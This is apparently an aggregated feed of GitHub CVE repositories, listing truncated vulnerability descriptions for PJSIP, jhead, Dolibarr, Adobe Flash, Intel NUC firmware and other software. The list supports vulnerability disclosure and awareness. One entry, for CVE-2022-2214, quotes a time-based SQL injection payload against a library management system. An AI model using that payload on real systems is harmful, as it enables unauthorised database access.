**PJSIP is a free and open source multimedia communication library written in the C language implementing standard based protocols such as SIP, SDP, RTP, STUN, TURN, and ICE. In various parts of PJSIP, when error/failure occurs, it is found that the function returns without releasing the currently held locks. This could CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-41141](https://github.com/Live-Hack-CVE/CVE-2021-41141) create time: 2022-12-28T08:45:29Z

**Denial of service (DoS) vulnerability in Nicotine+ 3.0.3 and later allows a user with a modified Soulseek client to crash Nicotine+ by sending a file download request with a file path containing a null character. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-45848](https://github.com/Live-Hack-CVE/CVE-2021-45848) create time: 2022-12-28T08:44:12Z

**A Denial of Service vulnerability exists in jhead 3.04 and 3.05 due to a wild address read in the Get16u function in exif.c in will cause segmentation fault via a crafted_file. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28275](https://github.com/Live-Hack-CVE/CVE-2021-28275) create time: 2022-12-28T08:44:05Z

**A Denial of Service vulnerability exists in jhead 3.04 and 3.05 via a wild address read in the ProcessCanonMakerNoteDir function in makernote.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28276](https://github.com/Live-Hack-CVE/CVE-2021-28276) create time: 2022-12-28T08:44:01Z

**A Heap-based Buffer Overflow vulnerabilty exists in jhead 3.04 and 3.05 is affected by: Buffer Overflow via the RemoveUnknownSections function in jpgfile.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28277](https://github.com/Live-Hack-CVE/CVE-2021-28277) create time: 2022-12-28T08:43:54Z

**A Heap-based Buffer Overflow vulnerability exists in jhead 3.04 and 3.05 via the RemoveSectionType function in jpgfile.c. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2021-28278](https://github.com/Live-Hack-CVE/CVE-2021-28278) create time: 2022-12-28T08:43:43Z

**Improper Restriction of Excessive Authentication Attempts in GitHub repository kareadita/kavita prior to 0.6.0.3. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3945](https://github.com/Live-Hack-CVE/CVE-2022-3945) create time: 2022-12-28T08:52:34Z

**A vulnerability was found in tholum crm42. It has been rated as critical. This issue affects some unknown processing of the file crm42\class\class.user.php of the component Login. The manipulation of the argument user_name leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3955](https://github.com/Live-Hack-CVE/CVE-2022-3955) create time: 2022-12-28T08:52:14Z

**A vulnerability classified as critical has been found in tsruban HHIMS 2.1. Affected is an unknown function of the component Patient Portrait Handler. The manipulation of the argument PID leads to sql injection. It is possible to launch the attack remotely. It is recommended to apply a patch to fix this issue. VDB-2134 CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3956](https://github.com/Live-Hack-CVE/CVE-2022-3956) create time: 2022-12-28T08:52:07Z

**A vulnerability classified as problematic was found in GPAC. Affected by this vulnerability is the function svg_parse_preserveaspectratio of the file scenegraph/svg_attributes.c of the component SVG Parser. The manipulation leads to memory leak. The attack can be launched remotely. The name of the patch is 2191e66aa7df CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3957](https://github.com/Live-Hack-CVE/CVE-2022-3957) create time: 2022-12-28T08:52:04Z

**A vulnerability, which was classified as problematic, has been found in drogon up to 1.8.1. Affected by this issue is some unknown functionality of the component Session Hash Handler. The manipulation leads to small space of random values. The attack may be launched remotely. Upgrading to version 1.8.2 is able to addre CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-3959](https://github.com/Live-Hack-CVE/CVE-2022-3959) create time: 2022-12-28T08:52:00Z

**Uncontrolled search path in the installer software for some Intel(r) NUC Kit Wireless Adapter drivers for Windows 10 before version 22.40 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36380](https://github.com/Live-Hack-CVE/CVE-2022-36380) create time: 2022-12-28T08:51:57Z

**Unquoted search path in the installer software for some Intel(r) NUC Kit Wireless Adapter drivers for Windows 10 before version 22.40 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36384](https://github.com/Live-Hack-CVE/CVE-2022-36384) create time: 2022-12-28T08:51:54Z

**IBM WebSphere Application Server 8.5, and 9.0 is vulnerable to cross-site scripting. This vulnerability allows users to embed arbitrary JavaScript code in the Web UI thus altering the intended functionality potentially leading to credentials disclosure within a trusted session. IBM X-Force ID: 236588. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-40750](https://github.com/Live-Hack-CVE/CVE-2022-40750) create time: 2022-12-28T08:51:51Z

**Path traversal in the installer software for some Intel(r) NUC Kit Wireless Adapter drivers for Windows 10 before version 22.40 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36400](https://github.com/Live-Hack-CVE/CVE-2022-36400) create time: 2022-12-28T08:51:43Z

**Incorrect default permissions in the installer software for some Intel(r) NUC Kit Wireless Adapter drivers for Windows 10 before version 22.40 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36377](https://github.com/Live-Hack-CVE/CVE-2022-36377) create time: 2022-12-28T08:51:26Z

**The Nextcloud Desktop Client is a tool to synchronize files from Nextcloud Server with your computer. In version 3.6.0, if a user received a malicious file share and has it synced locally or the virtual filesystem enabled and clicked a nc://open/ link it will open the default editor for the file type of the shared file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41882](https://github.com/Live-Hack-CVE/CVE-2022-41882) create time: 2022-12-28T08:50:21Z

**An Out-Of-Bounds Read Vulnerability in Autodesk FBX Review version 1.5.2 and prior may lead to code execution through maliciously crafted ActionScript Byte Code 'ABC' files or information disclosure. ABC files are created by the Flash compiler and contain executable code. This vulnerability in conjunction with other vu CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25794](https://github.com/Live-Hack-CVE/CVE-2022-25794) create time: 2022-12-28T08:50:11Z

**The Quotes llama WordPress plugin before 1.0.0 does not sanitise and escape Quotes, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed. The attack could also be performed by tricking an admin to import a malicious CSV file CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-1566](https://github.com/Live-Hack-CVE/CVE-2022-1566) create time: 2022-12-28T08:50:08Z

**Incomplete cleanup in some Intel(R) XMM(TM) 7560 Modem software before version M2_7560_R_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via adjacent access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27639](https://github.com/Live-Hack-CVE/CVE-2022-27639) create time: 2022-12-28T08:50:04Z

**StarWind SAN and NAS v0.2 build 1914 allow remote code execution. A flaw was found in REST API in StarWind Stack. REST command, which allows changing the hostname, doesn’t check a new hostname parameter. It goes directly to bash as part of a script. An attacker with non-root user access can inject arbitrary data into t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-32268](https://github.com/Live-Hack-CVE/CVE-2022-32268) create time: 2022-12-28T08:50:01Z

**Improper authentication in some Intel(R) XMM(TM) 7560 Modem software before version M2_7560_R_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-27874](https://github.com/Live-Hack-CVE/CVE-2022-27874) create time: 2022-12-28T08:49:57Z

**Element iOS is an iOS Matrix client provided by Element. It is based on MatrixSDK. Prior to version 1.9.7, events encrypted using Megolm for which trust could not be established did not get decorated accordingly (with warning shields). Therefore a malicious homeserver could inject messages into the room without the use CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41904](https://github.com/Live-Hack-CVE/CVE-2022-41904) create time: 2022-12-28T08:49:54Z

**Insecure default variable initialization in BIOS firmware for some Intel(R) NUC Boards and Intel(R) NUC Kits before version MYi30060 may allow an authenticated user to potentially enable denial of service via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36349](https://github.com/Live-Hack-CVE/CVE-2022-36349) create time: 2022-12-28T08:49:50Z

**Improper input validation in some Intel(R) XMM(TM) 7560 Modem software before version M2_7560_R_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28126](https://github.com/Live-Hack-CVE/CVE-2022-28126) create time: 2022-12-28T08:49:46Z

**Improper access control in BIOS firmware for some Intel(R) NUC 10 Performance Kits and Intel(R) NUC 10 Performance Mini PCs before version FNCML357.0053 may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36789](https://github.com/Live-Hack-CVE/CVE-2022-36789) create time: 2022-12-28T08:49:43Z

**Improper authentication in BIOS firmware for some Intel(R) NUC Boards and Intel(R) NUC Kits before version MYi30060 may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-36370](https://github.com/Live-Hack-CVE/CVE-2022-36370) create time: 2022-12-28T08:49:39Z

**Improper initialization in BIOS firmware for some Intel(R) NUC 11 Pro Kits and Intel(R) NUC 11 Pro Boards before version TNTGL357.0064 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37334](https://github.com/Live-Hack-CVE/CVE-2022-37334) create time: 2022-12-28T08:49:36Z

**A vulnerability was found in SourceCodester Library Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /librarian/bookdetails.php. The manipulation of the argument id with the input ' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB leads to sql in CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-2214](https://github.com/Live-Hack-CVE/CVE-2022-2214) create time: 2022-12-28T08:49:33Z

**Improper input validation in BIOS firmware for some Intel(R) NUC 11 Compute Elements before version EBTGL357.0065 may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-38099](https://github.com/Live-Hack-CVE/CVE-2022-38099) create time: 2022-12-28T08:49:29Z

**Improper authentication in BIOS firmware[A1] for some Intel(R) NUC Kits before version RY0386 may allow an authenticated user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-37345](https://github.com/Live-Hack-CVE/CVE-2022-37345) create time: 2022-12-28T08:49:26Z

**An open redirect vulnerability exists in CERT/CC VINCE software prior to 1.50.0. An attacker could send a link that has a specially crafted URL and convince the user to click the link. When an authenticated user clicks the link, the authenticated user's browser could be redirected to a malicious site that is designed t CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25799](https://github.com/Live-Hack-CVE/CVE-2022-25799) create time: 2022-12-28T08:49:22Z

**OpenSearch Notifications is a notifications plugin for OpenSearch that enables other plugins to send notifications via Email, Slack, Amazon Chime, Custom web-hook etc channels. A potential SSRF issue in OpenSearch Notifications Plugin 2.2.0 and below could allow an existing privileged user to enumerate listening servic CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-41906](https://github.com/Live-Hack-CVE/CVE-2022-41906) create time: 2022-12-28T08:49:00Z

**Improper input validation in some Intel(R) XMM(TM) 7560 Modem software before version M2_7560_R_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via physical access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-28611](https://github.com/Live-Hack-CVE/CVE-2022-28611) create time: 2022-12-28T08:48:57Z

**Improper buffer restrictions in some Intel(R) XMM(TM) 7560 Modem software before version M2_7560_R_01.2146.00 may allow a privileged user to potentially enable escalation of privilege via local access. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-26367](https://github.com/Live-Hack-CVE/CVE-2022-26367) create time: 2022-12-28T08:48:53Z

**The package angular after 1.7.0 are vulnerable to Regular Expression Denial of Service (ReDoS) by providing a custom locale rule that makes it possible to assign the parameter in posPre: ' '.repeat() of NUMBER_FORMATS.PATTERNS[1].posPre with a very high value. **Note:** 1) This package has been deprecated and is no lon CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2022-25844](https://github.com/Live-Hack-CVE/CVE-2022-25844) create time: 2022-12-28T08:48:50Z

**Multiple SQL injection vulnerabilities in Dolibarr 3.1.0 RC and probably earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) sortfield, (2) sortorder, and (3) sall parameters to user/index.php and (b) user/group/index.php; the id parameter to (4) info.php, (5) perms.php, (6) param_ihm CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-4802](https://github.com/Live-Hack-CVE/CVE-2011-4802) create time: 2022-12-28T08:01:18Z

**Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr 3.1.0 RC and probably earlier allow remote attackers to inject arbitrary web script or HTML via the PATH_INFO to (1) index.php, (2) admin/boxes.php, (3) comm/clients.php, (4) commande/index.php; and the optioncss parameter to (5) admin/ihm.php and (6) user CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-4814](https://github.com/Live-Hack-CVE/CVE-2011-4814) create time: 2022-12-28T08:01:14Z

**Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr 3.1.0 allow remote attackers to inject arbitrary web script or HTML via (1) the username parameter in a setup action to admin/company.php, or the PATH_INFO to (2) admin/security_other.php, (3) admin/events.php, or (4) admin/user.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2011-4329](https://github.com/Live-Hack-CVE/CVE-2011-4329) create time: 2022-12-28T08:01:03Z

**Multiple SQL injection vulnerabilities in Dolibarr CMS 3.2.0 Alpha and earlier allow remote authenticated users to execute arbitrary SQL commands via the (1) memberslist parameter (aka Member List) in list.php or (2) rowid parameter to adherents/fiche.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1225](https://github.com/Live-Hack-CVE/CVE-2012-1225) create time: 2022-12-28T08:02:01Z

**Multiple directory traversal vulnerabilities in Dolibarr CMS 3.2.0 Alpha allow remote attackers to read arbitrary files and possibly execute arbitrary code via a .. (dot dot) in the (1) file parameter to document.php or (2) backtopage parameter in a create action to comm/action/fiche.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2012-1226](https://github.com/Live-Hack-CVE/CVE-2012-1226) create time: 2022-12-28T08:01:36Z

**Dolibarr ERP/CRM 3.3.1 does not properly validate user input in viewimage.php and barcode.lib.php which allows remote attackers to execute arbitrary commands. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-2093](https://github.com/Live-Hack-CVE/CVE-2013-2093) create time: 2022-12-28T08:02:08Z

**SQL injection vulnerability in Dolibarr ERP/CRM 3.3.1 allows remote attackers to execute arbitrary SQL commands via the 'pays' parameter in fiche.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-2091](https://github.com/Live-Hack-CVE/CVE-2013-2091) create time: 2022-12-28T08:01:29Z

**Cross-site Scripting (XSS) in Dolibarr ERP/CRM 3.3.1 allows remote attackers to inject arbitrary web script or HTML in functions.lib.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2013-2092](https://github.com/Live-Hack-CVE/CVE-2013-2092) create time: 2022-12-28T08:01:26Z

**Multiple SQL injection vulnerabilities in Dolibarr ERP/CRM 3.5.3 allow remote authenticated users to execute arbitrary SQL commands via the (1) entity parameter in an update action to user/fiche.php or (2) sortorder parameter to user/group/index.php. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3992](https://github.com/Live-Hack-CVE/CVE-2014-3992) create time: 2022-12-28T08:01:21Z

**Multiple cross-site scripting (XSS) vulnerabilities in Dolibarr ERP/CRM 3.5.3 allow remote attackers to inject arbitrary web script or HTML via the (1) dol_use_jmobile, (2) dol_optimize_smallscreen, (3) dol_no_mouse_hover, (4) dol_hide_topmenu, (5) dol_hide_leftmenu, (6) mainmenu, or (7) leftmenu parameter to index.php CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2014-3991](https://github.com/Live-Hack-CVE/CVE-2014-3991) create time: 2022-12-28T08:01:07Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable memory corruption vulnerability in the NetConnection class when handling the proxy types. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7874](https://github.com/Live-Hack-CVE/CVE-2016-7874) create time: 2022-12-28T08:10:45Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable integer overflow vulnerability in the BitmapData class. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7875](https://github.com/Live-Hack-CVE/CVE-2016-7875) create time: 2022-12-28T08:10:41Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable use after free vulnerability in the Action Message Format serialization (AFM0). Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7877](https://github.com/Live-Hack-CVE/CVE-2016-7877) create time: 2022-12-28T08:10:25Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable memory corruption vulnerability in the Clipboard class related to data handling functionality. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7876](https://github.com/Live-Hack-CVE/CVE-2016-7876) create time: 2022-12-28T08:10:21Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable use after free vulnerability in the PSDK's MediaPlayer class. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7878](https://github.com/Live-Hack-CVE/CVE-2016-7878) create time: 2022-12-28T08:10:18Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable use after free vulnerability in the NetConnection class when handling an attached script object. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7879](https://github.com/Live-Hack-CVE/CVE-2016-7879) create time: 2022-12-28T08:10:14Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable use after free vulnerability when setting the length property of an array object. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7880](https://github.com/Live-Hack-CVE/CVE-2016-7880) create time: 2022-12-28T08:10:11Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable use after free vulnerability in the TextField class. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7892](https://github.com/Live-Hack-CVE/CVE-2016-7892) create time: 2022-12-28T08:10:07Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable use after free vulnerability in the MovieClip class when handling conversion to an object. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7881](https://github.com/Live-Hack-CVE/CVE-2016-7881) create time: 2022-12-28T08:10:03Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have security bypass vulnerability in the implementation of the same origin policy. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7890](https://github.com/Live-Hack-CVE/CVE-2016-7890) create time: 2022-12-28T08:10:00Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable memory corruption vulnerability in the PSDK class related to ad policy functionality method. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7873](https://github.com/Live-Hack-CVE/CVE-2016-7873) create time: 2022-12-28T08:09:14Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable buffer overflow / underflow vulnerability in the RegExp class for specific search strategies. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7870](https://github.com/Live-Hack-CVE/CVE-2016-7870) create time: 2022-12-28T08:09:10Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable use after free vulnerability in the MovieClip class related to objects at multiple presentation levels. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7872](https://github.com/Live-Hack-CVE/CVE-2016-7872) create time: 2022-12-28T08:09:07Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable memory corruption vulnerability in the Worker class. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7871](https://github.com/Live-Hack-CVE/CVE-2016-7871) create time: 2022-12-28T08:09:03Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable buffer overflow / underflow vulnerability in the RegExp class related to backtrack search functionality. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7869](https://github.com/Live-Hack-CVE/CVE-2016-7869) create time: 2022-12-28T08:08:29Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable buffer overflow / underflow vulnerability in the RegExp class related to alternation functionality. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7868](https://github.com/Live-Hack-CVE/CVE-2016-7868) create time: 2022-12-28T08:08:26Z

**Adobe Flash Player versions 23.0.0.207 and earlier, 11.2.202.644 and earlier have an exploitable buffer overflow / underflow vulnerability in the RegExp class related to bookmarking in searches. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2016-7867](https://github.com/Live-Hack-CVE/CVE-2016-7867) create time: 2022-12-28T08:08:22Z

**Adobe Flash Player versions 26.0.0.137 and earlier have a security bypass vulnerability that leads to information disclosure when performing URL redirect. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3085](https://github.com/Live-Hack-CVE/CVE-2017-3085) create time: 2022-12-28T08:09:56Z

**Adobe Flash Player versions 26.0.0.137 and earlier have an exploitable type confusion vulnerability when parsing SWF files. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-3106](https://github.com/Live-Hack-CVE/CVE-2017-3106) create time: 2022-12-28T08:09:53Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable memory corruption vulnerability related to processing of atoms in MP4 files. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2926](https://github.com/Live-Hack-CVE/CVE-2017-2926) create time: 2022-12-28T08:09:49Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable use after free vulnerability in the ActionScript FileReference class, when using class inheritance. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2937](https://github.com/Live-Hack-CVE/CVE-2017-2937) create time: 2022-12-28T08:09:46Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable use after free vulnerability in the ActionScript FileReference class. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2936](https://github.com/Live-Hack-CVE/CVE-2017-2936) create time: 2022-12-28T08:09:32Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable heap overflow vulnerability when parsing Adobe Texture Format files. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2934](https://github.com/Live-Hack-CVE/CVE-2017-2934) create time: 2022-12-28T08:09:29Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable heap overflow vulnerability related to texture compression. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2933](https://github.com/Live-Hack-CVE/CVE-2017-2933) create time: 2022-12-28T08:09:25Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable use after free vulnerability in the ActionScript MovieClip class. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2932](https://github.com/Live-Hack-CVE/CVE-2017-2932) create time: 2022-12-28T08:09:22Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable heap overflow vulnerability when processing the Flash Video container file format. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2935](https://github.com/Live-Hack-CVE/CVE-2017-2935) create time: 2022-12-28T08:09:19Z

**Dolibarr version 6.0.2 contains a Cross Site Scripting (XSS) vulnerability in Product details that can result in execution of javascript code. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-1000509](https://github.com/Live-Hack-CVE/CVE-2017-1000509) create time: 2022-12-28T08:02:15Z

**The test_sql_and_script_inject function in htdocs/main.inc.php in Dolibarr ERP/CRM 6.0.4 blocks some event attributes but neither onclick nor onscroll, which allows XSS. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17971](https://github.com/Live-Hack-CVE/CVE-2017-17971) create time: 2022-12-28T08:00:56Z

**SQL injection vulnerability in adherents/subscription/info.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the rowid parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17899](https://github.com/Live-Hack-CVE/CVE-2017-17899) create time: 2022-12-28T08:00:49Z

**SQL injection vulnerability in fourn/index.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the socid parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17900](https://github.com/Live-Hack-CVE/CVE-2017-17900) create time: 2022-12-28T08:00:45Z

**SQL injection vulnerability in comm/multiprix.php in Dolibarr ERP/CRM version 6.0.4 allows remote attackers to execute arbitrary SQL commands via the id parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17897](https://github.com/Live-Hack-CVE/CVE-2017-17897) create time: 2022-12-28T08:00:42Z

**Dolibarr ERP/CRM version 6.0.4 does not block direct requests to *.tpl.php files, which allows remote attackers to obtain sensitive information. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-17898](https://github.com/Live-Hack-CVE/CVE-2017-17898) create time: 2022-12-28T07:30:03Z

**Dolibarr ERP/CRM 4.0.4 stores passwords with the MD5 algorithm, which makes brute-force attacks easier. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7888](https://github.com/Live-Hack-CVE/CVE-2017-7888) create time: 2022-12-28T07:29:17Z

**Dolibarr ERP/CRM 4.0.4 has SQL Injection in doli/theme/eldy/style.css.php via the lang parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7886](https://github.com/Live-Hack-CVE/CVE-2017-7886) create time: 2022-12-28T07:29:07Z

**Dolibarr ERP/CRM 4.0.4 has XSS in doli/societe/list.php via the sall parameter. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-7887](https://github.com/Live-Hack-CVE/CVE-2017-7887) create time: 2022-12-28T07:28:56Z

**Dolibarr ERP/CRM 4.0.4 allows password changes without supplying the current password, which makes it easier for physically proximate attackers to obtain access via an unattended workstation. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-8879](https://github.com/Live-Hack-CVE/CVE-2017-8879) create time: 2022-12-28T07:28:40Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable memory corruption vulnerability related to setting visual mode effects. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2928](https://github.com/Live-Hack-CVE/CVE-2017-2928) create time: 2022-12-28T07:27:10Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable memory corruption vulnerability related to the parsing of SWF metadata. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2931](https://github.com/Live-Hack-CVE/CVE-2017-2931) create time: 2022-12-28T07:27:06Z

**Adobe Flash Player versions 24.0.0.186 and earlier have a security bypass vulnerability related to handling TCP connections. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2938](https://github.com/Live-Hack-CVE/CVE-2017-2938) create time: 2022-12-28T07:27:03Z

**Adobe Flash Player versions 24.0.0.186 and earlier have an exploitable memory corruption vulnerability due to a concurrency error when manipulating a display list. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2930](https://github.com/Live-Hack-CVE/CVE-2017-2930) create time: 2022-12-28T07:26:59Z

**Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable heap overflow vulnerability when parsing an MP4 header. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2992](https://github.com/Live-Hack-CVE/CVE-2017-2992) create time: 2022-12-28T07:26:55Z

**Adobe Flash Player versions 24.0.0.194 and earlier have an exploitable type confusion vulnerability related to the MessageChannel class. Successful exploitation could lead to arbitrary code execution. CVE project by @Sn0wAlice** : [Live-Hack-CVE/CVE-2017-2995](https://github.com/Live-Hack-CVE/CVE-2017-2995) create time: 2022-12-28T07:26:52Z

